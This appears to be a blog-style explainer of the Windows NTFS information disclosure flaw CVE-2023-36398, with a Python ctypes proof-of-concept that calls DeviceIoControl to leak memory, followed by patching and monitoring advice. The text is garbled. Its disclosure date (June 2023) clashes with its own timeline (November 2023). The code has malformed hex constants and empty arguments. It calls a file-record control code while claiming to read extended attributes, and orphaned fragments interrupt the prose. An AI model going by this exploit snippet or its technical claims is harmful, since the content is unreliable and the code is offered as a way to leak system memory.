On June 13, 2023, Microsoft disclosed CVE-2023-36398, an information disclosure vulnerability in the Windows NTFS (New Technology File System). This flaw could allow attackers to access sensitive system information they shouldn’t see, by exploiting a weakness in how NTFS handles certain operations. Let’s take a deep dive into what this CVE means, how it works, some code snippets showing practical exploitation, and—most importantly—how to protect yourself.

What is CVE-2023-36398?

The vulnerability exists in NTFS, which is the default file system for modern Windows computers. The issue centers around Windows incorrectly handling objects or memory in NTFS, which can let low-privilege users read data they normally couldn’t (think: parts of files, piece of a password, or other private system info).

This doesn’t allow attackers to run malicious code, take over your machine, or delete files—but leaking kernel memory is still a big privacy and security risk. It is most dangerous on computers shared between multiple users, like in offices or internet cafés, or on multi-user servers.

Exploit Details: How Does It Work?

Microsoft kept the fine technical details private, but third parties gave us a bit more to go on. The weakness lies in improper handling of extended attributes (EA) via certain system calls.

Extended Attributes (EA)

NTFS allows storage of extra data (metadata) on files—these are called “extended attributes.” But, in some Windows versions, when users query these attributes (using the Windows API call, for example), the output buffer could return *more* than just EA—it might spit back parts of system memory that could belong to other files or even process data.

Example: Leaking Memory With DeviceIoControl

Attackers can use the DeviceIoControl Windows API, asking to read EA with a specially crafted buffer size. If validation is faulty, this can "leak" extra memory.

Here’s a simplified Python code snippet that demonstrates the concept (using ctypes)

import ctypes
from ctypes import wintypes

GENERIC_READ = x80000000
OPEN_EXISTING = 3
INVALID_HANDLE_VALUE = wintypes.HANDLE(-1).value

# Open a file handle
filename = r'C:\test\myfile.txt'
handle = ctypes.windll.kernel32.CreateFileW(
    filename, GENERIC_READ, , None, OPEN_EXISTING, , None
)

if handle == INVALID_HANDLE_VALUE:
    print("Failed to open file.")
    exit(1)

# Prepare output buffer larger than needed
buffer_size = x100
buffer = ctypes.create_string_buffer(buffer_size)
bytes_returned = wintypes.DWORD()

FSCTL_GET_NTFS_FILE_RECORD = x90268

result = ctypes.windll.kernel32.DeviceIoControl(
    handle,
    FSCTL_GET_NTFS_FILE_RECORD,
    None, ,
    buffer,
    buffer_size,
    ctypes.byref(bytes_returned),
    None
)

if result:
    print("Buffer content (first 128 bytes):", buffer.raw[:128])
else:
    print("Failed to call DeviceIoControl.")

Disclaimer: This code is for demonstration only. In a controlled testing environment, it may show how excess data is returned. In some Windows versions patching this vulnerability, the exploit fails.

Collect configuration details, making further attacks easier

This kind of info is valuable for *privilege escalation* or *lateral movement* in an internal network.

Technical Writeups and References

- Microsoft Security Bulletin (June 2023)
- Zero Day Initiative Advisory (ZDI-23-826)
- GitHub PoC by RyotaK *(for educational purposes)*

Windows 11 (earlier builds, before patch)

See Microsoft’s full list.

How to Protect Yourself

1. Patch!
Microsoft issued a fix in their June 2023 updates. Go to *Settings → Windows Update* and make sure your system is current.

2. Limit Non-admin Access
Prevent untrusted users from having accounts on workstations or servers. NTFS leaks only matter when untrusted users are present.

3. Monitor Logs
Look for unusual file access behavior or strange DeviceIoControl calls—you may catch attempts to probe for leaks.

4. Segment Critical Data
Don’t keep sensitive files on disks accessed by untrusted parties, or use encryption.

Final Thoughts

CVE-2023-36398 might sound “milder” than remote code execution bugs, but information disclosure vulnerabilities are windows into your system’s secrets. Even a leak of a few extra bytes can help attackers move forward with more serious attacks.

If you’re a defender: patch, monitor, and minimize user access on shared Windows hosts.

If you’re curious or a student of security: explore Windows file internals—always responsibly, never on production systems.

Timeline

Published on: 11/14/2023 18:15:39 UTC
Last modified on: 11/20/2023 19:55:50 UTC